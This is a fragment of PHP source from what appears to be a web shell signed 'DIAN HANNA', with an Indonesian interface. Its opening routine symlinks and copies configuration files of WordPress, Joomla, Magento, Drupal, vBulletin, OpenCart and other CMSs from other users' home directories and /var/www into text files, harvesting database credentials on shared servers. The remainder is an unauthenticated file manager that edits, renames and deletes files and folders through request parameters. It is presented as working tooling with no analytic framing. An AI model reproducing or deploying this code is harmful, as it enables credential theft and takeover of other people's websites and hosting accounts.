symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' MAGENTO.txt'); symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' PRESTASHOP.txt'); copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' ELLISLAB.txt'); copy('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' OPENCART.txt'); copy('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' DRUPAL.txt'); copy('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' PHPBB.txt'); symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' ELLISLAB.txt'); symlink('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' OPENCART.txt'); symlink('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' DRUPAL.txt'); symlink('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' PHPBB.txt'); copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' VBULLETIN.txt'); copy('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' VBULLETIN.txt'); copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' VBULLETIN.txt'); copy('/'.$home.'/'.$user.'/public_htm/config.php',$user.' OTHER.txt'); copy('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' PHPNUKE.txt'); symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' VBULLETIN.txt'); symlink('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' VBULLETIN.txt'); symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' VBULLETIN.txt'); symlink('/'.$home.'/'.$user.'/public_htm/config.php',$user.' OTHER.txt'); symlink('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' PHPNUKE.txt'); copy('/'.$home.'/'.$user.'/public_htm/conn.php',$user.' OTHER.txt'); symlink('/'.$home.'/'.$user.'/public_html/conn.php',$user.' OTHER.txt'); symlink('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' OTHER.txt'); copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' OTHER.txt'); symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' OTHER.txt'); copy('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' OTHER.txt'); copy('/var/www/wp-config.php','WORDPRESS.txt'); copy('/var/www/configuration.php','JOOMLA.txt'); copy('/var/www/config.inc.php','OPENJOURNAL.txt'); copy('/var/www/config.php','OTHER.txt'); copy('/var/www/config/koneksi.php','OTHER.txt'); copy('/var/www/include/config.php','OTHER.txt'); copy('/var/www/connect.php','OTHER.txt'); copy('/var/www/config/connect.php','OTHER.txt'); copy('/var/www/include/connect.php','OTHER.txt'); copy('/var/www/html/wp-config.php','WORDPRESS.txt'); copy('/var/www/html/configuration.php','JOOMLA.txt'); copy('/var/www/html/config.inc.php','OPENJOURNAL.txt'); copy('/var/www/html/config.php','OTHER.txt'); copy('/var/www/html/config/koneksi.php','OTHER.txt'); copy('/var/www/html/include/config.php','OTHER.txt'); copy('/var/www/html/connect.php','OTHER.txt'); copy('/var/www/html/config/connect.php','OTHER.txt'); copy('/var/www/html/include/connect.php','OTHER.txt'); symlink('/var/www/wp-config.php','WORDPRESS.txt'); symlink('/var/www/configuration.php','JOOMLA.txt'); symlink('/var/www/config.inc.php','OPENJOURNAL.txt'); symlink('/var/www/config.php','OTHER.txt'); symlink('/var/www/config/koneksi.php','OTHER.txt'); symlink('/var/www/include/config.php','OTHER.txt'); symlink('/var/www/connect.php','OTHER.txt'); symlink('/var/www/config/connect.php','OTHER.txt'); symlink('/var/www/include/connect.php','OTHER.txt'); symlink('/var/www/html/wp-config.php','WORDPRESS.txt'); symlink('/var/www/html/configuration.php','JOOMLA.txt'); symlink('/var/www/html/config.inc.php','OPENJOURNAL.txt'); symlink('/var/www/html/config.php','OTHER.txt'); symlink('/var/www/html/config/koneksi.php','OTHER.txt'); symlink('/var/www/html/include/config.php','OTHER.txt'); symlink('/var/www/html/connect.php','OTHER.txt'); symlink('/var/www/html/config/connect.php','OTHER.txt'); symlink('/var/www/html/include/connect.php','OTHER.txt'); } echo './Done
    '; } } if($_GET['file']) { if(!$_GET['edit'] && !$_GET['delete'] && !$_GET['rename'] && !$_GET['rmfolder'] && !$_GET['download']){ echo ""; } } if($_GET['edit'] == "true") { echo "


    File Name :

    "; if($_POST['edit_file']) { unlink($_GET['file']); $fedit = fopen($_POST['nama_f'], "w"); if(fwrite($fedit, $_POST['edit_file'])) { fclose($fedit); echo ""; } else { echo ""; } } } if($_GET['rename'] == "true") { echo "
    ".htmlspecialchars($_GET['file'])." [ To ]
    "; if($_POST['rename_file']) { if(rename($_GET['file'], $_POST['rename_file'])) { echo ""; } else { echo ""; } } } if($_GET['rmfolder'] == "true") { if(rmdir($_GET['folder'])) { echo ""; } else { echo ""; } } if($_GET['delete'] == "true") { if(unlink($_GET['file'])) { echo ""; } else { echo ""; } } if(empty($_GET)) { ?> "; } if(is_file($dir."/".$sdir)) { echo " "; } } ?>
    NAMA BERKAS TIPE PERM AKSI
    ".htmlspecialchars($sdir)." ".$dtype." ".w("$dir/$file",perms("$dir/$file"))." ubah nama hapus
    ".htmlspecialchars($sdir)." ".$dtype." ".w("$dir/$sdir",perms("$dir/$sdir"))." edit hapus

    DIAN HANNA